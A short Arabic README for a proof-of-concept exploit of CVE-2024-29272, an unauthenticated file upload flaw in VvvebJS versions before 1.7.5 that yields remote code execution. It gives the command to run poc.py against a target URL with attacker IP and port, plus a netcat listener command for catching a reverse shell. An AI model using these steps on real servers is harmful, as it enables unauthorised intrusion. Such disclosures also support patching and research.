
إثبات مفهوم لاستغلال CVE-2024-29272، وهي ثغرة رفع ملفات تعسفي دون مصادقة في VvvebJS < 1.7.5، مما يتيح تنفيذ التعليمات البرمجية عن بعد.
هذا هو إثبات المفهوم (Proof-of-Concept) لـ CVE-2024-29272، وهو ثغرة رفع ملفات تعسفية غير مصادق عليها تؤدي إلى تنفيذ تعليمات برمجية عن بُعد على إصدارات VvvebJS < 1.7.5
الاستخدام:
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
في طرفية أخرى:
nc -lvnp <ATTACKER PORT>